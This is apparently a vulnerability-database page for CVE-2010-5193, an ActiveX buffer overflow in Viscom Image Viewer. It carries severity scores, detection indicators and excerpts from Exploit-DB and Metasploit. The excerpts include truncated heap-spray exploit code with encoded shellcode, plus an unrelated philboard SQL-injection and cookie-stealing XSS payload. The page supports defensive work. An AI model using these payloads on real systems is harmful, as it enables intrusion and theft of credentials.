CVE-2010-5193
published 2012-08-31CVE-2010-5193: Stack-based buffer overflow in the TIFMergeMultiFiles function in the SCRIBBLE.ScribbleCtrl.1 ActiveX control (ImageViewer2.ocx) in Viscom Image Viewer CP Pro…
PriorityP259critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
31.97%
98.1th percentile
Stack-based buffer overflow in the TIFMergeMultiFiles function in the SCRIBBLE.ScribbleCtrl.1 ActiveX control (ImageViewer2.ocx) in Viscom Image Viewer CP Pro 8.0 and Gold 6.0 allows remote attackers to execute arbitrary code via a long strDelimit parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| viscomsoft | image_viewer_cp_gold_sdk | — | — |
| viscomsoft | image_viewer_cp_pro_sdk | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploitation attempts by monitoring for instantiation of the SCRIBBLE.ScribbleCtrl.1 ActiveX control (ImageViewer2.ocx) combined with a long strDelimit parameter passed to TIFMergeMultiFiles/TifMergeMultiFiles. ↗
- →The Metasploit module targets User-Agent strings matching Windows XP (NT 5.1), Vista (NT 6.0), and Windows 7 (NT 6.1) with MSIE 6.0, 7.0, or 8.0; network detection should alert on exploit page delivery to these UA patterns. ↗
- →The DEP/ASLR bypass ROP chain for IE8/Vista/Win7 targets uses MSVCR71.dll ROP gadgets; presence of ROP gadget addresses from MSVCR71.dll (e.g., 0x7C37653D, 0x7C347F98) on the stack is a strong indicator of exploitation. ↗
- →The exploit uses a heap spray with unescape NOP sled (%u9090%u9090) and encoded shellcode in JavaScript; IDS/IPS rules should look for the characteristic shellcode bytes in HTTP responses alongside ActiveX object instantiation of ImageViewer2.ocx. ↗
- →The exploit pivot address 0x12AE0FE4 is used as the return address overwrite; memory forensics or crash analysis showing EIP/saved return address set to this value indicates exploitation of this specific vulnerability. ↗
- →Post-exploitation, the Metasploit module auto-migrates the injected process; endpoint detection should monitor for unexpected child processes spawned from the browser (iexplore.exe) following ImageViewer2.ocx load. ↗
- ·Exploitation requires the victim to explicitly trust the publisher 'Viscom Software' via an ActiveX trust prompt; exploitation will fail if the user denies the trust dialog. ↗
- ·The DEP and ASLR bypass path (targets[2]) requires Java support to be present on the victim machine; without Java, the bypass will not function on Vista/Win7/XP IE8. ↗
- ·The module is excluded from Metasploit autopwn automation due to the manual trust requirement. ↗
- ·Payload bad characters are restricted to null bytes only (\x00); other characters are safe to use in shellcode. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)
exploitdb·2011-11-17
CVE-2010-5194 Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)
Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control',
'Description' => %q{
This module exploits a stack based buffer overflow in the Active control file
ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles()
method. Exploitation results in code execution with the privileges of the user who
browsed to the exploit page.
The victim will first be required to trust the publisher Viscom Softwa
Exploit-DB
Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Remote Buffer Overflow
exploitdb·2010-12-03
CVE-2010-5193 Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Remote Buffer Overflow
Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Remote Buffer Overflow
---
//payload is windows/exec cmd=calc.exe
shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;
while(nops.length
Exploit-DB
W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting
exploitdb·2008-06-27
CVE-2008-5193 W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting
W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting
---
> [+] Script Name : philboard v 1.14 Multiple Remote Exploits
> |+| Team : InjEct0r5
> [+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ;
> [+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
> [+] Dork : Powered by v1.14 powered by philboard v1.14
> --//-->
> [+] Expl0iT :
> Remote SQL Injection :
> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]
> Blind Way : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00
> Remote XSS Exploit :
> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]
[XSS] --> alert(document.cookie)
# milw0rm.com [2008-06-27]
Metasploit
Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
metasploit
Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
This module exploits a stack based buffer overflow in the Active control file ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.
No writeups or analysis indexed.
http://secunia.com/advisories/42445http://www.exploit-db.com/exploits/15668http://www.exploit-db.com/exploits/18123https://exchange.xforce.ibmcloud.com/vulnerabilities/63666http://secunia.com/advisories/42445http://www.exploit-db.com/exploits/15668http://www.exploit-db.com/exploits/18123https://exchange.xforce.ibmcloud.com/vulnerabilities/63666
2012-08-31
Published